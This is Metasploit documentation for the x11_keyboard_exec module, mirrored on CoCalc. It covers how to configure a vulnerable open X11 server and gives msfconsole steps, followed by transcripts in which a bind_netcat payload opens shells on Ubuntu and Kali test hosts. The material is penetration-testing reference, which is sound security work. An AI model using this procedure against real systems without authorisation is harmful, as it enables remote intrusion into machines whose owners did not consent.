Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/unix/x11/x11_keyboard_exec.md
24890 views

Vulnerable Application

X11 (X Window System) is a graphical windowing system most common on unix/linux. The service can accept connections from any users when misconfigured which is done with the command xhost +.

This exploit has been verified against:

  1. Ubuntu 14.04

  2. Ubuntu 16.04

  3. Kali via Emulation method

This exploit does NOT work against:

  1. Solaris 10 Java Desktop System (alt+F2 has no effect)

Emulation

This can be emulated (on kali) utilizing the following command: socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0

Ubuntu 12.04, 14.04

  1. sudo nano /etc/lightdm/lightdm.conf

  2. Under the [SeatDefaults] area, add:

    xserver-allow-tcp=true
allow-guest=true

  3. logout or reboot

  4. Verification: sudo netstat -antp | grep 6000

    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X

  5. Now, to verify you allow ANYONE to get on X11, type: xhost +

Ubuntu 16.04

Use the Ubuntu 12.04 instructions, however change SeatDefaults to Seat:*

Verification Steps

  1. Install and configure X11

  2. Start msfconsole

  3. Do: use exploit/unix/x11/x11_keyboard_exec

  4. Do: set rhost [IPs]

  5. Do: set payload [payload]

  6. Do: exploit

Scenarios

Ubuntu 14.04

msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > run

[*] Started bind handler
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"

Ubuntu 16.04

msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
rhost => 192.168.2.26
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > exploit

[*] Started bind handler
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400

id 
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
UBUNTU_CODENAME=xenial

Kali via Emulation

msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(x11_keyboard_exec) > run

[*] Started bind handler
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400